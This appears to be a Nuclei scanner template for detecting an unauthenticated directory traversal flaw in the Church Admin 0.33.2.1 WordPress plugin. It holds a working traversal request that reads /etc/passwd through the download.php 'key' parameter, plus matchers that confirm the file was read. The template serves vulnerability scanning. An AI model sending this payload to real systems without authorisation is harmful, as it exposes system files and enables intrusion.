28 lines
757 B
YAML
28 lines
757 B
YAML
|
id: church-admin-lfi
|
||
|
|
||
|
info:
|
||
|
name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/8997
|
||
|
- https://id.wordpress.org/plugins/church-admin/
|
||
|
tags: wordpress,wp-plugin,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|